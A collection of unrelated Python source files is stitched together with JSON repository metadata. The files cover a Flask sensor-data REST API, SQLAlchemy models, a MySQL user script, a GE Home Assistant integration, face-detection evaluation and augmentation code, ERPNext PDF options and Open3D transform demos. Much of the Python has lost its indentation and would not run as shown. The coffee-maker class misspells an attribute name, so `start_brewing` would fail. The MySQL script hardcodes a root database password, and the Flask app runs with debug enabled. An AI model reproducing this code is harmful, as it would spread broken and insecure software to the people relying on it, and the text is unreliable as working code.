def get(self, uuid):
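        # Resolve the device's location by walking the room -> floor -> building chain.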
record = Device.query.filter_by(uuid=uuid).first()
if record:
try:
roomInfor = Room.query.filter_by(
id=record.room_id).first_or_404()
floorInfor = Floor.query.filter_by(
id=roomInfor.floor_id).first_or_404()
buildInfor = Building.query.filter_by(
id=floorInfor.building_id).first_or_404()
deviceInfor = {}
deviceInfor['floor_name'] = floorInfor.name
deviceInfor['room_name'] = roomInfor.name
deviceInfor['build_name'] = buildInfor.name
return deviceInfor, 200
except:
return {"warning": "you may input error information,\
please ask the Administrator"}
else:
return {"error": "device not exit"}
def put(self, uuid):
parser = reqparse.RequestParser()
parser.add_argument('uuid', type=str)
args = parser.parse_args()
record = Device.query.filter_by(uuid=uuid).first()
if record:
record.uuid = args['uuid']
db.session.commit()
return {"status": 'updated'}, 201
else:
return {"status": 'device not exit'}, 404
def delete(self, uuid):
record = Device.query.filter_by(uuid=uuid).first()
if record:
db.session.delete(record)
db.session.commit()
return {'status': 'deleted'}, 204
else:
            return {'status': 'device not exist'}
class dataSensor(Resource):
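    # POST: given building/floor/room names and a sensor type, return the 10 most
    # recent readings for that sensor on the device in that room.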
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('build_name', type=unicode)
parser.add_argument('floor_name', type=str)
parser.add_argument('room_name', type=str)
parser.add_argument('sensor_type', type=str)
args = parser.parse_args(strict=True)
buildInfor = Building.query.filter_by(
name=args['build_name']).first_or_404()
if buildInfor:
floorInfor = Floor.query.filter_by(
name=args['floor_name'],
building_id=buildInfor.id).first_or_404()
if floorInfor:
roomInfor = Room.query.filter_by(
name=args['room_name'],
floor_id=floorInfor.id).first_or_404()
if roomInfor:
deviceInfor = Device.query.filter_by(
room_id=roomInfor.id).first_or_404()
sensorInfor = Sensor.query.filter_by(
type=args['sensor_type']).first_or_404()
if sensorInfor and deviceInfor:
buf = SensorData.query.filter_by(
sensor_id=sensorInfor.id,
device_id=deviceInfor.id
).order_by('datetime desc').limit(10)
if buf is not None:
return to_json_list(buf), 201
else:
return {"status": "no data"}
else:
return {"status": "no data"}
class dataList(Resource):
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('build_name', type=unicode)
parser.add_argument('floor_name', type=str)
parser.add_argument('room_name', type=str)
args = parser.parse_args(strict=True)
buildInfor = Building.query.filter_by(
name=args['build_name']).first_or_404()
if buildInfor:
floorInfor = Floor.query.filter_by(
name=args['floor_name'],
building_id=buildInfor.id).first_or_404()
if floorInfor:
roomInfor = Room.query.filter_by(
name=args['room_name'],
floor_id=floorInfor.id).first_or_404()
if roomInfor:
deviceInfor = Device.query.filter_by(
room_id=roomInfor.id).first_or_404()
if deviceInfor:
result = SensorData.query.filter_by(
device_id=deviceInfor.id
).order_by('datetime desc').limit(10)
return to_json_list(result), 201
class locationInfor(Resource):
def get(self):
locaList = []
rooms = Room.query.all()
if rooms:
for room in rooms:
location = {}
location['room_name'] = room.name
floors = Floor.query.filter_by(id=room.floor_id).all()
if floors:
for floor in floors:
location['floor_name'] = floor.name
build = Building.query.filter_by(
id=floor.building_id).all()
if build is not None:
location['build_name'] = build[0].name
locaList.append(location)
else:
                            return {'status': 'the building not exist'}
else:
                    return {'status': 'the floor not exist'}
else:
            return {'status': 'the room not exist'}
return locaList
api.add_resource(UserList, '/user', '/user/')
api.add_resource(UserResource, '/user/<user_id>')
api.add_resource(Login, '/login', '/login/')
api.add_resource(BuildingList, '/building', '/building/')
api.add_resource(BuildingResource, '/building/<building_id>')
api.add_resource(FloorList, '/floor', '/floor/')
api.add_resource(FloorResource, '/floor/<floor_id>')
api.add_resource(RoomList, '/room', '/room/')
api.add_resource(RoomResource, '/room/<room_id>')
api.add_resource(DeviceList, '/device', '/device/')
api.add_resource(DeviceResource, '/device/<device_id>')
api.add_resource(dList, '/data', '/data/')
api.add_resource(DataResource, '/data/<data_id>')
api.add_resource(sensorList, '/sensor', '/sensor/')
api.add_resource(sensorResource, '/sensor/<sensor_id>')
api.add_resource(locationResource, '/location/<uuid>')
api.add_resource(locationList, '/location', '/location/')
api.add_resource(dataSensor, '/type/data', '/type/data/')
api.add_resource(dataList, '/all/data', '/all/data/')
api.add_resource(locationInfor, '/get/location', '/get/location/')
if __name__ == '__main__':
app.run(debug=True)
```
#### File: restless_api/restless_api/model.py
```python
from flask import Flask
from flask.ext.sqlalchemy import SQLAlchemy
import flask.ext.restless
from config import *
# Create the Flask application and the Flask-SQLAlchemy object.
app = Flask(__name__)
app.config['DEBUG'] = True
app.config['SQLALCHEMY_DATABASE_URI'] = SQLALCHEMY_DATABASE_URI
db = SQLAlchemy(app)
# Create your Flask-SQLALchemy models as usual but with the following two
# (reasonable) restrictions:
# 1. They must have a primary key column of type sqlalchemy.Integer or
# type sqlalchemy.Unicode.
# 2. They must have an __init__ method which accepts keyword arguments for
# all columns (the constructor in flask.ext.sqlalchemy.SQLAlchemy.Model
# supplies such a method, so you don't need to declare a new one).
class User(db.Model):
__tablename__ = 'user'
id = db.Column(db.Integer, primary_key=True, nullable=False)
username = db.Column(db.String(255), unique=True, nullable=False)
password = db.Column(db.String(255), nullable=False)
email = db.Column(db.String(255), unique=True, nullable=False)
def __init__(self, username, password, email):
self.username = username
self.password = password
self.email = email
class Building(db.Model):
__tablename__ = 'building'
id = db.Column(db.Integer, primary_key=True, nullable=False)
name = db.Column(db.String(255), nullable=False)
latitude = db.Column(db.String(255))
longitude = db.Column(db.String(255))
description = db.Column(db.String(255))
relationship = db.relationship('Floor', backref='building', lazy='dynamic')
class Floor(db.Model):
__tablename__ = 'floor'
id = db.Column(db.Integer, primary_key=True, nullable=False)
building_id = db.Column(
db.Integer, db.ForeignKey('building.id'), nullable=False)
name = db.Column(db.String(255), nullable=False)
description = db.Column(db.String(255))
relationship = db.relationship('Room', backref='floor', lazy='dynamic')
class Room(db.Model):
__tablename__ = 'room'
id = db.Column(db.Integer, primary_key=True, nullable=False)
floor_id = db.Column(db.Integer, db.ForeignKey('floor.id'), nullable=False)
name = db.Column(db.String(255), nullable=False)
description = db.Column(db.String(255))
relationship = db.relationship('Device', backref='room', lazy='dynamic')
class Device(db.Model):
__tablename__ = 'device'
id = db.Column(db.Integer, primary_key=True, nullable=False)
room_id = db.Column(db.Integer, db.ForeignKey('room.id'), nullable=False)
name = db.Column(db.String(255), nullable=False)
description = db.Column(db.String(255))
relationship = db.relationship(
'SensorData', backref='device', lazy='dynamic')
class Sensor(db.Model):
__tablename__ = 'sensor'
id = db.Column(db.Integer, primary_key=True, nullable=False)
name = db.Column(db.String(255), nullable=False)
type = db.Column(db.String(255), nullable=False)
description = db.Column(db.String(255))
relationship = db.relationship(
'SensorData', backref='sensor', lazy='dynamic')
class SensorData(db.Model):
__tablename__ = 'sensor_data'
id = db.Column(db.Integer, primary_key=True, nullable=False)
sensor_id = db.Column(
db.Integer, db.ForeignKey('sensor.id'), nullable=False)
device_id = db.Column(
db.Integer, db.ForeignKey('device.id'), nullable=False)
value = db.Column(db.Float)
datetime = db.Column(db.DateTime)
status = db.Column(db.Integer)
# Create the database tables.
# db.create_all()
``` |
{
"source": "87-midnight/NewbieInProgramin",
"score": 3
} |
#### File: packages/mysql/user_operate.py
```python
import sys
sys.path.append("J:\\NewbieInPrograming\\python-code\\packages\\mysql\\")
from sys_user import User
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
# Initialize the database connection:
engine = create_engine('mysql+pymysql://root:123456@localhost:3306/test?charset=utf8')
# Create the DBSession class:
DBSession = sessionmaker(bind=engine)
session = DBSession()
def create_user():
    # Create new User objects:
new_user = User(id=3, name='john',gender='male',address='河北')
user1 = User(id=4,name='amy',gender='female',address='天津')
print(new_user.__tablename__)
print(new_user.id)
print(user1.id)
    # Add them to the session:
session.add(new_user)
session.add(user1)
    # Commit to save to the database:
session.commit()
def query_user():
list_ = session.query(User).all()
for item in list_:
print("查询结果:", item)
def get_user_id(id_=None):
if id_ is None:
return "no id set up"
return session.query(User).filter(User.id == id_).one()
if __name__ == '__main__':
# create_user()
query_user()
print("获取单个用户:", get_user_id(1))
    # Close the session:
session.close()
```
#### File: packages/scheduledTask/simple_job.py
```python
from datetime import datetime
import time
def job_exec_per_sec(seconds):
"""
    Runs a periodic task using a while loop plus time.sleep.
    :param seconds: interval between task runs, in seconds
    :return: does not return (loops forever)
"""
while True:
print("while循环定时任务执行了,时间:%s" % datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
time.sleep(seconds)
if __name__ == '__main__':
job_exec_per_sec(10)
``` |
{
"source": "87racer/ha_gehome",
"score": 2
} |
#### File: ge_home/devices/base.py
```python
import asyncio
import logging
from typing import Dict, List, Optional
from gehomesdk import GeAppliance
from gehomesdk.erd import ErdCode, ErdCodeType, ErdApplianceType
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator
from ..const import DOMAIN
_LOGGER = logging.getLogger(__name__)
class ApplianceApi:
"""
API class to represent a single physical device.
Since a physical device can have many entities, we"ll pool common elements here
"""
APPLIANCE_TYPE = None # type: Optional[ErdApplianceType]
def __init__(self, coordinator: DataUpdateCoordinator, appliance: GeAppliance):
if not appliance.initialized:
raise RuntimeError("Appliance not ready")
self._appliance = appliance
self._loop = appliance.client.loop
self._hass = coordinator.hass
self.coordinator = coordinator
self.initial_update = False
self._entities = {} # type: Optional[Dict[str, Entity]]
@property
def hass(self) -> HomeAssistant:
return self._hass
@property
def loop(self) -> Optional[asyncio.AbstractEventLoop]:
if self._loop is None:
self._loop = self._appliance.client.loop
return self._loop
@property
def appliance(self) -> GeAppliance:
return self._appliance
@appliance.setter
def appliance(self, value: GeAppliance):
self._appliance = value
@property
def available(self) -> bool:
#Note - online will be there since we're using the GE coordinator
#Didn't want to deal with the circular references to get the type hints
#working.
return self.appliance.available and self.coordinator.online
@property
def serial_number(self) -> str:
return self.appliance.get_erd_value(ErdCode.SERIAL_NUMBER)
@property
def mac_addr(self) -> str:
return self.appliance.mac_addr
@property
def serial_or_mac(self) -> str:
if self.serial_number and not self.serial_number.isspace():
return self.serial_number
return self.mac_addr
@property
def model_number(self) -> str:
return self.appliance.get_erd_value(ErdCode.MODEL_NUMBER)
@property
def sw_version(self) -> str:
appVer = self.try_get_erd_value(ErdCode.APPLIANCE_SW_VERSION)
wifiVer = self.try_get_erd_value(ErdCode.WIFI_MODULE_SW_VERSION)
return 'Appliance=' + str(appVer or 'Unknown') + '/Wifi=' + str(wifiVer or 'Unknown')
@property
def name(self) -> str:
appliance_type = self.appliance.appliance_type
if appliance_type is None or appliance_type == ErdApplianceType.UNKNOWN:
appliance_type = "Appliance"
else:
appliance_type = appliance_type.name.replace("_", " ").title()
return f"GE {appliance_type} {self.serial_or_mac}"
@property
def device_info(self) -> Dict:
"""Device info dictionary."""
return {
"identifiers": {(DOMAIN, self.serial_or_mac)},
"name": self.name,
"manufacturer": "GE",
"model": self.model_number,
"sw_version": self.sw_version
}
@property
def entities(self) -> List[Entity]:
return list(self._entities.values())
def get_all_entities(self) -> List[Entity]:
"""Create Entities for this device."""
return self.get_base_entities()
def get_base_entities(self) -> List[Entity]:
"""Create base entities (i.e. common between all appliances)."""
from ..entities import GeErdSensor, GeErdSwitch
entities = [
GeErdSensor(self, ErdCode.CLOCK_TIME),
GeErdSwitch(self, ErdCode.SABBATH_MODE),
]
return entities
def build_entities_list(self) -> None:
"""Build the entities list, adding anything new."""
from ..entities import GeErdEntity, GeErdButton
entities = [
e for e in self.get_all_entities()
if not isinstance(e, GeErdEntity) or isinstance(e, GeErdButton) or e.erd_code in self.appliance.known_properties
]
for entity in entities:
if entity.unique_id not in self._entities:
self._entities[entity.unique_id] = entity
def try_get_erd_value(self, code: ErdCodeType):
try:
return self.appliance.get_erd_value(code)
except:
return None
def has_erd_code(self, code: ErdCodeType):
try:
self.appliance.get_erd_value(code)
return True
except:
return False
```
#### File: ge_home/devices/coffee_maker.py
```python
import logging
from typing import List
from homeassistant.helpers.entity import Entity
from gehomesdk import (
GeAppliance,
ErdCode,
ErdApplianceType,
ErdCcmBrewSettings
)
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator
from .base import ApplianceApi
from ..entities import (
GeCcmPotNotPresentBinarySensor,
GeErdSensor,
GeErdBinarySensor,
GeErdButton,
GeCcmBrewStrengthSelect,
GeCcmBrewTemperatureNumber,
GeCcmBrewCupsNumber,
GeCcmBrewSettingsButton
)
_LOGGER = logging.getLogger(__name__)
class CcmApi(ApplianceApi):
"""API class for Cafe Coffee Maker objects"""
APPLIANCE_TYPE = ErdApplianceType.CAFE_COFFEE_MAKER
def __init__(self, coordinator: DataUpdateCoordinator, appliance: GeAppliance):
super().__init__(coordinator, appliance)
self._brew_strengh_entity = GeCcmBrewStrengthSelect(self)
self._brew_temperature_entity = GeCcmBrewTemperatureNumber(self)
self._brew_cups_entity = GeCcmBrewCupsNumber(self)
def get_all_entities(self) -> List[Entity]:
base_entities = super().get_all_entities()
ccm_entities = [
GeErdBinarySensor(self, ErdCode.CCM_IS_BREWING),
GeErdBinarySensor(self, ErdCode.CCM_IS_DESCALING),
GeCcmBrewSettingsButton(self),
GeErdButton(self, ErdCode.CCM_CANCEL_DESCALING),
GeErdButton(self, ErdCode.CCM_START_DESCALING),
GeErdButton(self, ErdCode.CCM_CANCEL_BREWING),
self._brew_strengh_entity,
self._brew_temperature_entity,
self._brew_cups_entity,
GeErdSensor(self, ErdCode.CCM_CURRENT_WATER_TEMPERATURE),
GeErdBinarySensor(self, ErdCode.CCM_OUT_OF_WATER, device_class_override="problem"),
GeCcmPotNotPresentBinarySensor(self, ErdCode.CCM_POT_PRESENT, device_class_override="problem")
]
entities = base_entities + ccm_entities
return entities
async def start_brewing(self) -> None:
"""Aggregate brew settings and start brewing."""
        new_mode = ErdCcmBrewSettings(
            self._brew_cups_entity.value,
            self._brew_strength_entity.brew_strength,
            self._brew_temperature_entity.brew_temperature,
        )
await self.appliance.async_set_erd_value(ErdCode.CCM_BREW_SETTINGS, new_mode)
```
#### File: ge_home/devices/water_softener.py
```python
import logging
from typing import List
from homeassistant.helpers.entity import Entity
from gehomesdk import ErdCode, ErdApplianceType
from .base import ApplianceApi
from ..entities import (
GeErdSensor,
GeErdPropertySensor,
GeErdBinarySensor,
GeErdShutoffPositionSelect,
)
_LOGGER = logging.getLogger(__name__)
class WaterSoftenerApi(ApplianceApi):
"""API class for water softener objects"""
APPLIANCE_TYPE = ErdApplianceType.WATER_SOFTENER
def get_all_entities(self) -> List[Entity]:
base_entities = super().get_all_entities()
ws_entities = [
GeErdBinarySensor(self, ErdCode.WH_FILTER_MANUAL_MODE, icon_on_override="mdi:human", icon_off_override="mdi:robot"),
GeErdPropertySensor(self, ErdCode.WH_FILTER_FLOW_RATE, "flow_rate"),
GeErdBinarySensor(self, ErdCode.WH_FILTER_FLOW_ALERT, device_class_override="moisture"),
GeErdSensor(self, ErdCode.WH_FILTER_DAY_USAGE),
GeErdSensor(self, ErdCode.WH_SOFTENER_ERROR_CODE, icon_override="mdi:alert-circle"),
GeErdBinarySensor(self, ErdCode.WH_SOFTENER_LOW_SALT, icon_on_override="mdi:alert", icon_off_override="mdi:grain"),
GeErdSensor(self, ErdCode.WH_SOFTENER_SHUTOFF_VALVE_STATE, icon_override="mdi:state-machine"),
GeErdSensor(self, ErdCode.WH_SOFTENER_SALT_LIFE_REMAINING, icon_override="mdi:calendar-clock"),
GeErdShutoffPositionSelect(self, ErdCode.WH_SOFTENER_SHUTOFF_VALVE_CONTROL),
]
entities = base_entities + ws_entities
return entities
```
#### File: entities/ccm/ge_ccm_brew_strength.py
```python
import logging
from typing import List, Any, Optional
from gehomesdk import ErdCode, ErdCcmBrewStrength
from ...devices import ApplianceApi
from ..common import GeErdSelect, OptionsConverter
from .ge_ccm_cached_value import GeCcmCachedValue
_LOGGER = logging.getLogger(__name__)
class GeCcmBrewStrengthOptionsConverter(OptionsConverter):
def __init__(self):
self._default = ErdCcmBrewStrength.MEDIUM
@property
def options(self) -> List[str]:
return [i.stringify() for i in [ErdCcmBrewStrength.LIGHT, ErdCcmBrewStrength.MEDIUM, ErdCcmBrewStrength.BOLD, ErdCcmBrewStrength.GOLD]]
def from_option_string(self, value: str) -> Any:
try:
return ErdCcmBrewStrength[value.upper()]
        except (KeyError, AttributeError):
            _LOGGER.warning(f"Could not set brew strength to {value}")
return self._default
def to_option_string(self, value: ErdCcmBrewStrength) -> Optional[str]:
try:
return value.stringify()
        except Exception:
return self._default.stringify()
class GeCcmBrewStrengthSelect(GeErdSelect, GeCcmCachedValue):
def __init__(self, api: ApplianceApi):
GeErdSelect.__init__(self, api = api, erd_code = ErdCode.CCM_BREW_STRENGTH, converter = GeCcmBrewStrengthOptionsConverter())
GeCcmCachedValue.__init__(self)
@property
def brew_strength(self) -> ErdCcmBrewStrength:
return self._converter.from_option_string(self.current_option)
async def async_select_option(self, value):
GeCcmCachedValue.set_value(self, value)
self.schedule_update_ha_state()
@property
def current_option(self):
return self.get_value(device_value = super().current_option)
```
#### File: entities/common/ge_erd_number.py
```python
import logging
from typing import Optional
from gehomesdk.erd.erd_data_type import ErdDataType
from homeassistant.components.number import NumberEntity
from homeassistant.const import (
DEVICE_CLASS_TEMPERATURE,
TEMP_FAHRENHEIT,
)
from gehomesdk import ErdCodeType, ErdCodeClass
from .ge_erd_entity import GeErdEntity
from ...devices import ApplianceApi
_LOGGER = logging.getLogger(__name__)
class GeErdNumber(GeErdEntity, NumberEntity):
"""GE Entity for numbers"""
def __init__(
self,
api: ApplianceApi,
erd_code: ErdCodeType,
erd_override: str = None,
icon_override: str = None,
device_class_override: str = None,
uom_override: str = None,
data_type_override: ErdDataType = None,
min_value: float = 1,
max_value: float = 100,
step_value: float = 1,
mode: str = "auto"
):
super().__init__(api, erd_code, erd_override, icon_override, device_class_override)
self._uom_override = uom_override
self._data_type_override = data_type_override
self._min_value = min_value
self._max_value = max_value
self._step_value = step_value
self._mode = mode
@property
def value(self):
try:
value = self.appliance.get_erd_value(self.erd_code)
return self._convert_value_from_device(value)
except KeyError:
return None
@property
def unit_of_measurement(self) -> Optional[str]:
return self._get_uom()
@property
def _data_type(self) -> ErdDataType:
if self._data_type_override is not None:
return self._data_type_override
return self.appliance.get_erd_code_data_type(self.erd_code)
@property
def min_value(self) -> float:
return self._convert_value_from_device(self._min_value)
@property
def max_value(self) -> float:
return self._convert_value_from_device(self._max_value)
@property
def step(self) -> float:
return self._step_value
@property
    def mode(self) -> str:
return self._mode
def _convert_value_from_device(self, value):
"""Convert to expected data type"""
if self._data_type == ErdDataType.INT:
return int(round(value))
else:
return value
def _get_uom(self):
"""Select appropriate units"""
#if we have an override, just use it
if self._uom_override:
return self._uom_override
if self.device_class == DEVICE_CLASS_TEMPERATURE:
#NOTE: it appears that the API only sets temperature in Fahrenheit,
#so we'll hard code this UOM instead of using the device configured
#settings
return TEMP_FAHRENHEIT
return None
def _get_device_class(self) -> Optional[str]:
if self._device_class_override:
return self._device_class_override
if self.erd_code_class in [
ErdCodeClass.RAW_TEMPERATURE,
ErdCodeClass.NON_ZERO_TEMPERATURE,
]:
return DEVICE_CLASS_TEMPERATURE
return None
def _get_icon(self):
if self.erd_code_class == ErdCodeClass.DOOR:
if self.state.lower().endswith("open"):
return "mdi:door-open"
if self.state.lower().endswith("closed"):
return "mdi:door-closed"
return super()._get_icon()
async def async_set_value(self, value):
"""Sets the ERD value, assumes that the data type is correct"""
if self._data_type == ErdDataType.INT:
value = int(round(value))
try:
await self.appliance.async_set_erd_value(self.erd_code, value)
        except Exception:
_LOGGER.warning(f"Could not set {self.name} to {value}")
``` |
{
"source": "87ZGitHub/sfd.pytorch",
"score": 2
} |
#### File: 87ZGitHub/sfd.pytorch/evaluation_metrics.py
```python
import numpy as np
from anchor import compute_iou
import torch
def AP(prediction, gt, iou_threshold):
"""compute average precision of detection, all the coordinate should be
(top left bottom right)
Args:
predict_bboxes (ndarray): should be a N * (4 + 1 + 1) ndarray
N is number of boxes been predicted(batch_size),
4 represents [top, left, bottom, right],
1 is the confidence of the class
1 is the number represents the class
gt_bboxes (ndarray): should be a M * (4 + 1) ndarray
M is the number of ground truth bboxes of that image
4 represents [top, left, bottom, right],
1 represents the class number of the bbox. Since we use 0 to be the
background, so class number of object should be started from 1
iou_threshold (float): threshold of iou for seperate the true positive
or false positive
num_classes (int): how many classes of the target
Returns: vector of class_number size, each element is AP
value of every class
"""
    # split the prediction into bounding boxes, confidence scores and class labels
bboxes = prediction[:, :4]
scores = prediction[:, 4]
klasses = prediction[:, 5]
# sort klass, scores, bboxes by value of scores
inds = np.argsort(scores)[::-1]
scores, klasses, bboxes = scores[inds], klasses[inds], bboxes[inds]
# get a list result of tp and fp, length should be the same as bboxes
result = np.zeros(len(bboxes))
matched_index = []
ious = compute_iou(bboxes, gt[:, :4])
for index, iou in enumerate(ious):
gt_index = np.argmax(iou)
if iou[gt_index] > iou_threshold \
and gt_index not in matched_index \
and klasses[index] == gt[gt_index, 4]:
result[index] = 1
matched_index.append(gt_index)
# get tp and fp result of every class
ap_of_klass = {}
for klass in np.unique(klasses):
klass_indices = klasses == klass
klass_result = result[klass_indices]
object_num = np.sum(gt[:, 4] == klass)
cumsum = np.cumsum(klass_result)
recall_point_num = np.unique(cumsum)
        precisions = np.zeros_like(recall_point_num, dtype=float)
        recalls = np.zeros_like(recall_point_num, dtype=float)
for recall_point in recall_point_num:
recall_point = int(recall_point)
if recall_point == 0:
continue
predictions_num = np.searchsorted(cumsum, recall_point) + 1.0
precisions[recall_point - 1] = float(recall_point) / predictions_num
recalls[recall_point - 1] = recall_point / object_num
recalls = np.insert(recalls, 0, 0.0)
precisions = np.insert(precisions, 0, 0.0)
recalls = np.append(recalls, 1.0)
precisions = np.append(precisions, 0.0)
# make precision monotone decreased
current_precision = 0
for i in range(len(precisions) - 1, -1, -1):
precisions[i] = max(current_precision, precisions[i])
current_precision = precisions[i]
ap = 0
for i in range(1, len(precisions)):
precision = precisions[i]
recall_span = recalls[i] - recalls[i - 1]
ap += precision * recall_span
ap_of_klass[klass] = ap
return ap_of_klass
def softmax(mat):
"""change a vector to softmax score in batch
Args:
mat (ndarray): 2 dimensional matrix, shape is [batch_size, array_size]
Returns:
ndarray: a tensor which is has the same shape as the input
"""
mat_exp = torch.exp(mat)
mat_sum = torch.sum(mat_exp, dim=1, keepdim=True)
return mat_exp / mat_sum
```
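A minimal usage sketch for the two helpers above (assumptions: this module is importable as `evaluation_metrics`, and the repository's `anchor.compute_iou` returns an N * M IoU matrix as the `AP` docstring implies):
```python
import numpy as np
import torch
from evaluation_metrics import AP, softmax  # assumed module name

# Two class-1 predictions that exactly match the two class-1 ground truth
# boxes, so the AP for class 1.0 is expected to be 1.0.
prediction = np.array([
    [0, 0, 10, 10, 0.9, 1],   # [top, left, bottom, right, confidence, class]
    [20, 20, 30, 30, 0.8, 1],
], dtype=float)
gt = np.array([
    [0, 0, 10, 10, 1],        # [top, left, bottom, right, class]
    [20, 20, 30, 30, 1],
], dtype=float)

print(AP(prediction, gt, iou_threshold=0.5))  # expected: {1.0: 1.0}

# softmax works on a 2-D torch tensor, one row per sample; each row sums to 1.
logits = torch.tensor([[1.0, 2.0, 3.0], [0.0, 0.0, 0.0]])
print(softmax(logits))
```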
#### File: 87ZGitHub/sfd.pytorch/imageaug.py
```python
import numpy as np
from random import random
def crop_square(image, coordinates, ratio=1, keep_area_threshold=0.5):
"""random crop a image into a square image and change the
original coordinates to new coordinates. Some coordinates will be last
if it is at outside of the cropped area.
Args:
image (ndarray): numpy image, should be [height, width, channel]
coordinates (tuple): a tuple of coordinates list, should be
([top, left, bottom, right], ...)
ratio (int, optional): defaults to 1. cropped ratio, relative to the
shorter edge of the image
keep_area_threshold (float, optional): defaults to 0.5. how much area
in the cropped size of a ground truth bounding box to decide whther
to keep it.
Returns:
tuple: (cropped_image, new_coordinates), noticed that new_coordinates
may be an empty list.
"""
size = image.shape[:2]
short_size = np.min(size)
square_size = int(short_size * ratio)
n_top = int((image.shape[0] - square_size) * random())
n_left = int((image.shape[1] - square_size) * random())
n_bottom = n_top + square_size
n_right = n_left + square_size
cropped_image = image[n_top:n_bottom, n_left:n_right]
new_coordinates = []
for coordinate in coordinates:
width = coordinate[3] - coordinate[1]
height = coordinate[2] - coordinate[0]
n_width = max(min(coordinate[3], n_right) - max(coordinate[1], n_left), 0)
n_height = max(min(coordinate[2], n_bottom) - max(coordinate[0], n_top), 0)
# there are some all zero coordinates in wider face
if (width * height) == 0:
continue
area_in_crop = (n_width * n_height) / (width * height)
if area_in_crop < keep_area_threshold:
continue
        # clip the transformed box to the boundaries of the square crop
        new_coordinates.append([
            max(coordinate[0] - n_top, 0),
            max(coordinate[1] - n_left, 0),
            min(coordinate[2] - n_top, square_size),
            min(coordinate[3] - n_left, square_size),
            *coordinate[4:]
        ])
return cropped_image, new_coordinates
def random_horizontal_flip(image, coordinates):
"""randomly horizontal flip a image and its coodinates
Args:
image (ndarray): numpy image, should be [height, width, channel]
coordinates (tuple): a tuple of coordinates list, should be
([top, left, bottom, right], ...)
Returns:
        tuple: (image, new_coordinates), note that new_coordinates
may be an empty list.
"""
if random() > 0.5:
return image, coordinates
image = image[:, ::-1, :]
new_coordinates = []
for coordinate in coordinates:
        # after a horizontal flip the old right edge becomes the new left edge
        new_coordinates.append([
            coordinate[0],
            image.shape[1] - coordinate[3],
            coordinate[2],
            image.shape[1] - coordinate[1],
            *coordinate[4:]
        ])
return image, new_coordinates
``` |
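A small self-contained sketch of chaining the two augmentations on a dummy image (assumption: this file is importable as `imageaug`):
```python
import numpy as np
from imageaug import crop_square, random_horizontal_flip  # assumed module name

image = np.random.randint(0, 256, size=(480, 640, 3), dtype=np.uint8)
boxes = [[100, 120, 200, 260, 1]]  # [top, left, bottom, right, class]

cropped, cropped_boxes = crop_square(image, boxes, ratio=0.8, keep_area_threshold=0.5)
flipped, flipped_boxes = random_horizontal_flip(cropped, cropped_boxes)

# cropped is square; boxes may be dropped entirely if the random crop missed them.
print(cropped.shape, flipped_boxes)
```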
{
"source": "8848digital/erpnext-print-formats",
"score": 2
} |
#### File: erpnext-print-formats/erpnext_print_formats/pdf.py
```python
import frappe
from frappe.utils.pdf import read_options_from_html,get_cookie_options
def prepare_options(html, options):
if not options:
options = {}
options.update({
'print-media-type': None,
'background': None,
'images': None,
'quiet': None,
# 'no-outline': None,
'encoding': "UTF-8",
#'load-error-handling': 'ignore'
})
if not options.get("margin-right"):
options['margin-right'] = '1mm'
if not options.get("margin-left"):
options['margin-left'] = '1mm'
html, html_options = read_options_from_html(html)
options.update(html_options or {})
# cookies
options.update(get_cookie_options())
# page size
if not options.get("page-size"):
options['page-size'] = frappe.db.get_single_value("Print Settings", "pdf_page_size") or "A4"
return html, options
``` |
{
"source": "888dahong888/open3dTest",
"score": 3
} |
#### File: 888dahong888/open3dTest/test02.py
```python
import open3d as o3d
import numpy as np
# Translation operations
def test_translate(mesh,copy):
mesh=o3d.geometry.TriangleMesh.create_coordinate_frame()
    mesh_tx = copy.deepcopy(mesh).translate((1.3, 0, 0))
    mesh_ty = copy.deepcopy(mesh).translate((0, 1.3, 0))
print("center of mesh: ",mesh.get_center())
print(f'Center of mesh tx: {mesh_tx.get_center()}')
print(f'Center of mesh ty: {mesh_ty.get_center()}')
o3d.visualization.draw_geometries([mesh, mesh_tx, mesh_ty])
mesh_mv = copy.deepcopy(mesh).translate((2,2,2), relative=False) #移动中心点
print(f'Center of mesh: {mesh.get_center()}')
print(f'Center of translated mesh: {mesh_mv.get_center()}')
o3d.visualization.draw_geometries([mesh, mesh_mv])
# Rotation operations
def test_rotate(mesh,copy):
mesh = o3d.geometry.TriangleMesh.create_coordinate_frame()
mesh_r = copy.deepcopy(mesh)
R = mesh.get_rotation_matrix_from_xyz((np.pi/2,0,np.pi/4))
mesh_r.rotate(R, center=(0,0,0))
o3d.visualization.draw_geometries([mesh, mesh_r])
mesh = o3d.geometry.TriangleMesh.create_coordinate_frame()
mesh_r = copy.deepcopy(mesh).translate((2,0,0))
mesh_r.rotate(mesh.get_rotation_matrix_from_xyz((np.pi/2,0,np.pi/4)), center=(0,0,0))
o3d.visualization.draw_geometries([mesh, mesh_r])
# Scaling operations
def test_scale(mesh,copy):
mesh = o3d.geometry.TriangleMesh.create_coordinate_frame()
mesh_s = copy.deepcopy(mesh).translate((2,0,0))
mesh_s.scale(0.5, center=mesh_s.get_center())
o3d.visualization.draw_geometries([mesh, mesh_s])
mesh = o3d.geometry.TriangleMesh.create_coordinate_frame()
mesh_s = copy.deepcopy(mesh).translate((2,1,0))
mesh_s.scale(0.5, center=(0,0,0))
o3d.visualization.draw_geometries([mesh, mesh_s])
# General transformation operations
def test_transform(mesh,copy):
mesh = o3d.geometry.TriangleMesh.create_coordinate_frame()
T = np.eye(4)
T[:3,:3] = mesh.get_rotation_matrix_from_xyz((0,np.pi/3, np.pi/2))
T[0,3] = 1
T[1,3] = 1.3
print(T)
mesh_t = copy.deepcopy(mesh).transform(T)
o3d.visualization.draw_geometries([mesh, mesh_t])
``` |
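A usage sketch for the helpers above (assumptions: the file is importable as `test02`, open3d is installed, and a display is available, since every helper opens visualizer windows):
```python
import copy

import open3d as o3d

from test02 import test_translate, test_rotate, test_scale, test_transform  # assumed module name

mesh = o3d.geometry.TriangleMesh.create_coordinate_frame()

# Each helper rebuilds its own coordinate frame internally and pops up
# visualization windows comparing the original and transformed meshes.
test_translate(mesh, copy)
test_rotate(mesh, copy)
test_scale(mesh, copy)
test_transform(mesh, copy)
```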
{
"source": "88Chemin/splitwise-analyzer",
"score": 3
} |
#### File: splitwise-analyzer/wallstreet/__init__.py
```python
def get_index_for_dude(dude):
"""
:param dude: splitwise user object
